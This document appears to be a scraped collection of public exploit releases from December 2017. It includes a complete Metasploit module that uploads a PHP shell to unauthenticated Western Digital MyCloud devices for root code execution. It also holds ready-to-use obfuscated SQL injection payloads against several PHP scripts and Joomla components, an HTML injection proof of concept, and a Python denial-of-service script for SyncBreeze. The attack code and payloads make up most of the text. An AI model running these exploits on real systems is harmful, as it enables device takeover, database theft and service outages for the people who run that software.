Western Digital MyCloud multi_uploadify File Upload

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
HttpFingerprint = { :method => ‘HEAD’, :uri => ‘/web/’, :pattern => [/Apache/] }

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper

def initialize(info={})
super(update_info(info,
‘Name’ => ‘Western Digital MyCloud multi_uploadify File Upload Vulnerability’,
‘Description’ => %q{
This module exploits a file upload vulnerability found in Western Digital’s MyCloud
NAS web administration HTTP service. The /web/jquery/uploader/multi_uploadify.php
PHP script provides multipart upload functionality that is accessible without authentication
and can be used to place a file anywhere on the device’s file system. This allows an
attacker the ability to upload a PHP shell onto the device and obtain arbitrary code
execution as root.
},
‘License’ => MSF_LICENSE,
‘Author’ =>
[
‘Zenofex <zenofex[at]exploitee.rs>’ # Initial vulnerability discovery, PoC, and Metasploit module
],
‘References’ =>
[
[‘URL’, ‘https://www.exploitee.rs/index.php/Western_Digital_MyCloud#.2Fjquery.2Fuploader.2Fmulti_uploadify.php_.28added_08.2F06.2F2017.29’],
[‘URL’, ‘https://download.exploitee.rs/file/generic/Exploiteers-DEFCON25.pdf’],
[‘URL’, ‘https://www.youtube.com/watch?v=EO_49pfmA5A’],
[‘CVE’, ‘2017-17560’]
],
‘Platform’ => ‘php’,
‘Arch’ => ARCH_PHP,
‘Targets’ =>
[
[‘Automatic Targeting’, { ‘auto’ => true }]
],
‘Privileged’ => true,
‘DisclosureDate’ => ‘Jul 29 2017’,
‘DefaultTarget’ => 0))
end

def check
res = send_request_cgi(‘uri’ => ‘/web/jquery/uploader/multi_uploadify.php’)

if res.nil?
vprint_error(‘Connection failed’)
return CheckCode::Unknown
end

if res.code == 302 && res.headers[‘Location’] =~ /\?status=1/
return CheckCode::Vulnerable
end

CheckCode::Safe
end

def upload(web_folder, fname, file)
# construct post data
data = Rex::MIME::Message.new
data.add_part(file, ‘application/x-php’, nil, “form-data; name=\”Filedata[]\”; filename=\”#{fname}\””)

# upload
res = send_request_cgi({
‘method’ => ‘POST’,
‘uri’ => ‘/web/jquery/uploader/multi_uploadify.php’,
‘ctype’ => “multipart/form-data; boundary=#{data.bound}”,
‘data’ => data.to_s,
‘vars_get’ => {
‘folder’ => web_folder
}
})
end

def exploit
if check != CheckCode::Vulnerable
fail_with(Failure::NotVulnerable, ‘Target does not appear to be a vulnerable Western Digital MyCloud device’)
end

# upload PHP payload to ‘/var/www’ (webroot).
web_folder = ‘/var/www’
php = “<?php #{payload.encoded} ?>”
print_status(“Uploading PHP payload (#{php.length} bytes) to ‘#{web_folder}’.”)
fname = “.#{rand_text_alphanumeric(rand(10) + 6)}.php”

res = upload(web_folder, fname, php)

# check upload response
fail_with(Failure::Unreachable, ‘No response received from the target.’) unless res
if res.code != 302 || res.headers[‘Location’] =~ /\?status=0/
fail_with(Failure::UnexpectedReply, “Unexpected reply (#{res.body.length} bytes)”)
end
print_good(‘Uploaded PHP payload successfully.’)

# register uploaded php payload file for cleanup
register_files_for_cleanup(fname)

# retrieve and execute PHP payload
print_status(“Making request for ‘/#{fname}’ to execute payload.”)
res = send_request_cgi({‘uri’ => normalize_uri(fname)}, 15)
end

end

Bus Booking Script 1.0 SQL Injection

<!--
# # # # #
# Exploit Title: Bus Booking Script 1.0 - SQL Injection
# Dork: N/A
# Date: 13.12.2017
# Vendor Homepage: http://www.phpautoclassifiedscript.com/
# Software Link: http://www.phpautoclassifiedscript.com/bus-booking-script.html
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-17645
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
-->
<html>
<body>
<form action="http://localhost/newbusbooking/admin/index.php" method="post" enctype="application/x-www-form-urlencoded" name="frmlogin" target="_self">
<input name="txtname" type="text" value="' UNION ALL SELECT 0x31,0x564552204159415249,0x33,0x34,0x35-- Ver Ayari"></div>
<input name="logbut" id="logbut" type="submit"></div>
</form>
</body>
</html>

FS Lynda Clone 1.0 SQL Injection

<!--
# # # # #
# Exploit Title: FS Lynda Clone 1.0 - SQL Injection
# Dork: N/A
# Date: 13.12.2017
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://fortunescripts.com/product/lynda-clone/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-17643
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
-->
<html>
<body>
<form action="http://localhost/tutorial/" method="post">
<input value="1' and(select 1 FROM(select count(*),concat((select (select concat(database(),0x27,0x7e,0x494853414e2053454e43414e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -" name="keywords" id="keywords" type="search">
<input value="GO" type="submit">
</form>
</body>
</html>

Movie Guide 2.0 SQL Injection

Movie Guide 2.0 SQL Injection
Posted Dec 15, 2017
Authored by Ihsan Sencan

Movie Guide version 2.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | fa1fcffffe6c7f17040a8f614cf5f4cc
# # # # #
# Exploit Title: Movie Guide 2.0 - SQL Injection
# Dork: N/A
# Date: 15.12.2017
# Vendor Homepage: http://applebitemedia.com/
# Software Link: http://applebitemedia.com/amwdl/AM_Movie_Guide.tar.gz
# Version: 2.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php?md=[SQL]
#
# %2dV'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%[email protected]:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%[email protected]:=export_set(5%2cexport_set(5%[email protected]%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%[email protected]%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d
#
# 2)
# http://localhost/[PATH]/index.php?pid=minfo&Movie_Id=[SQL]
#
# %2dV'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%[email protected]:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%[email protected]:=export_set(5%2cexport_set(5%[email protected]%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%[email protected]%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d
#
# 3)
# http://localhost/[PATH]/index.php?director=[SQL]
#
# a'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%[email protected]:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%[email protected]:=export_set(5%2cexport_set(5%[email protected]%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%[email protected]%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d
#
# 4)
# http://localhost/[PATH]/index.php?actor=[SQL]
#
# -a'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%[email protected]:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%[email protected]:=export_set(5%2cexport_set(5%[email protected]%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%[email protected]%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d
#
# 5)
# http://localhost/[PATH]/index.php?gterm=[SQL]
#
# -a'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%[email protected]:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%[email protected]:=export_set(5%2cexport_set(5%[email protected]%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%[email protected]%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d
#
# 6)
# http://localhost/[PATH]/index.php?year=[SQL]
#
# -a'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%[email protected]:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%[email protected]:=export_set(5%2cexport_set(5%[email protected]%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%[email protected]%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d
#
# # # # #

Piwigo 2.9.1 SQL Injection

# # # # # 
# Exploit Title: Piwigo <= 2.9.1 - 'cat_true'/'cat_false' SQL Injection
# Dork: N/A
# Date: 12.12.2017
# Vendor Homepage: http://piwigo.org/
# Software Link: http://piwigo.org/basics/downloads
# Version: <= 2.9.1
# Category: Webapps
# Tested on: WiN7_x64/WIN10_X64
# CVE: CVE-2017-10682
# # # # #
# Exploit Author: Akityo
# Email: [email protected]
# # # # #
# Description:
#
# SQL injection vulnerability in the administrative backend in Piwigo through 2.9.1 allows remote users to execute arbitrary SQL commands via the cat_false or cat_true parameter
# in the comments or status page to cat_options.php.
#
#
# # # # #
# Proof-of-Concent:
#
# POST /[path]/admin.php?page=cat_options&section=status HTTP/1.1
# Host: www.test.com
# Content-Length: 34
# Cache-Control: max-age=0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
# Upgrade-Insecure-Requests: 1
# User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
# Content-Type: application/x-www-form-urlencoded
# Accept-Encoding: gzip, deflate
# Accept-Language: zh-CN,zh;q=0.8
# Cookie: null
# Connection: close
#
# cat_false%5B%5D=[payload here]&trueify=%C2%AB
#
#
# # # # #

Paid To Read Script 2.0.5 SQL Injection

Paid To Read Script 2.0.5 SQL Injection
Posted Dec 15, 2017
Authored by Ihsan Sencan

Paid To Read Script version 2.0.5 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
advisories | CVE-2017-17651
MD5 | 545bfdb1f82a68e71a7cad4dc9bd9a1f
# # # # # 
# Exploit Title: Paid To Read Script 2.0.5 - SQL Injection
# Dork: N/A
# Date: 13.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/paid-to-read-script/
# Version: 2.0.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-17651
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/admin/userview.php?uid=[SQL]
#
# -9++/*!08888UNION*/(/*!08888SELECT*/(1)%2c(2)%2c(3)%2c(4)%2c(5)%2c(6)%2c(7)%2c(8)%2c(9)%2c(10)%2c(11)%2c(12)%2c(13)%2c(14)%2c(15)%2c(16)%2c(17)%2c(18)%2c(19)%2c(20)%2c(21)%2c(22)%2c(23)%2c(24)%2c(25)%2c(26)%2c(27)%2c(28)%2c(29)%2c(30)%2c(31)%2c(32)%2c(33)%2c(34)%2c(35)%2c(36)%2c(37)%2c(38)%2c(39)%2c(40)%2c(41)%2c(42)%2c(43)%2c(44)%2c(45)%2c(46)%2c(47)%2c(48)%2c(/*!08888Select*/+export_set(5%[email protected]:=0%2c(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)[email protected]:=export_set(5%2cexport_set(5%[email protected]%2c/*!08888table_name*/%2c0x3c6c693e%2c2)%2c/*!08888column_name*/%2c0xa3a%2c2))%[email protected]%2c2))%2c(50)%2c(51)%2c(52)%2c(53)%2c(54)%2c(55)%2c(56)%2c(57)%2c(58)%2c(59)%2c(60)%2c(61)%2c(62)%2c(63)%2c(64)%2c(65)%2c(66)%2c(67)%2c(68))--+-
#
#
# 2)
# http://localhost/[PATH]/admin/viewemcamp.php?fnum=[SQL]
#
# -1++/*!08888UNION*/(/*!08888SELECT*/+0x253238253331253239%2cCONCAT_WS(0x203a20%2cUSER()%2cDATABASE()%2cVERSION())%2c0x253238253333253239%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239)--+-
#
#
# 3)
# http://localhost/[PATH]/admin/viewvisitcamp.php?fn=[SQL]
#
# -6++/*!50000UNION*/(/*!50000SELECT*/0x253238253331253239%2c0x253238253332253239%2c0x253238253333253239%2c0x253238253334253239%2cCONCAT_WS(0x203a20%2cUSER()%2cDATABASE()%2cVERSION())%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239%2c0x253238253331253333253239%2c0x253238253331253334253239)--+-
#
#
# # # # #

Readymade Video Sharing Script 3.2 HTML Injection

Readymade Video Sharing Script 3.2 HTML Injection
Posted Dec 15, 2017
Authored by Ihsan Sencan

Readymade Video Sharing Script version 3.2 suffers from a html injection vulnerability.

tags | exploit, xss
advisories | CVE-2017-17649
MD5 | 9f828121974beff69a49a0bc657533bf
# # # # # 
# Exploit Title: Readymade Video Sharing Script 3.2 - HTML Injection
# Dork: N/A
# Date: 13.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/php-video-sharing-script/
# Demo: http://www.smsemailmarketing.in/demo/videosharing/
# Version: 3.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-17649
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability implication allows an attacker to inject html code ....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/single-video-detail.php?video_id=MTMy&comment=[CODE]&comment_submit=
#
#
# # # # #

Joomla! JEXTN Video Gallery 3.0.5 SQL Injection

# # # # #
# Exploit Title: Joomla! Component JEXTN Video Gallery 3.0.5 - SQL Injection
# Dork: N/A
# Date: 13.12.2017
# Vendor Homepage: http://jextn.com/
# Software Link: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/jextn-video-gallery/
# Version: 3.0.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_jevideogallery&view=category&id=99[SQL]
#
# 99%20AND(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT(SELECT%20CONCAT(CAST(DATABASE()%20AS%20CHAR)%2c0x7e,0x496873616e53656e63616e))%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)
#
#
# # # # #

Joomla! JEXTN Question And Answer 3.1.0 SQL Injection

# # # # #
# Exploit Title: Joomla! Component JEXTN Question And Answer 3.1.0 - SQL Injection
# Dork: N/A
# Date: 13.12.2017
# Vendor Homepage: http://jextn.com/
# Software Link: https://extensions.joomla.org/extensions/extension/communication/question-a-answers/jextn-question-and-answer/
# Version: 3.1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php/en/component/jequestions/?view=tags&an=[SQL]
#
# %2dVerAyari'%20%2f*!06666UNION*%2f%20%2f*!06666SELECT*/%201%2c(SELECT%20GROUP_CONCAT(table_name%20SEPARATOR%200x3c62723e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_SCHEMA=DATABASE())%2c3%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13%2c14%2c15%2c16%2c17%2c18%2c19%2c20%2c21%2c22%2c23%2c24%2c25%2d%2d%20%2d
#
#
# 2)
# <html>
# <body>
# <form name="pagination" action="http://localhost/index.php/en/component/jequestions/" method="post">
# <input name="ques-srch" value="1'and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='" type="hidden">
# <button id="que_srch">Ver Ayari</button>
# </form>
# </body>
# </html>
# # # # #

Sync Breeze 10.2.12 Denial Of Service

=============================================
MGC ALERT 2017-007
– Original release date: November 30, 2017
– Last revised: December 14, 2017
– Discovered by: Manuel GarcAa CA!rdenas
– Severity: 7,5/10 (CVSS Base Score)
– CVE-ID: CVE-2017-17088
=============================================

I. VULNERABILITY
————————-
SyncBreeze <= 10.2.12 – Denial of Service

II. BACKGROUND
————————-
SyncBreeze is a fast, powerful and reliable file synchronization solution
for local disks, network shares, NAS storage devices and enterprise storage
systems.

III. DESCRIPTION
————————-
The Enterprise version of SyncBreeze is affected by a Remote Denial of
Service vulnerability.

The web server does not check bounds when reading server request in the
Host header on making a connection, resulting in a classic Buffer Overflow
that causes a Denial of Service.

To exploit the vulnerability only is needed use the version 1.1 of the HTTP
protocol to interact with the application.

IV. PROOF OF CONCEPT
————————-
#!/usr/bin/python
import sys, socket

host = sys.argv[1]
buffer=”GET / HTTP/1.1\r\n”
buffer+=”Host: “+”A”*2000+”\r\n\r\n”

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 80))
s.send(buffer)
s.close()

V. BUSINESS IMPACT
————————-
Availability compromise can result from these attacks.

VI. SYSTEMS AFFECTED
————————-
SyncBreeze <= 10.2.12

VII. SOLUTION
————————-
Vendor release 10.3 version
http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.3.14.exe

VIII. REFERENCES
————————-
http://www.syncbreeze.com/

IX. CREDITS
————————-
This vulnerability has been discovered and reported
by Manuel GarcAa CA!rdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
————————-
November 30, 2017 1: Initial release
December 14, 2017 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
————————-
November 30, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
November 30, 2017 2: Send to vendor
December 6, 2017 3: Vendor fix the vulnerability and release a new version
December 14, 2017 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
————————-
The information contained within this advisory is supplied “as-is” with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
————————-
Manuel Garcia Cardenas
Pentester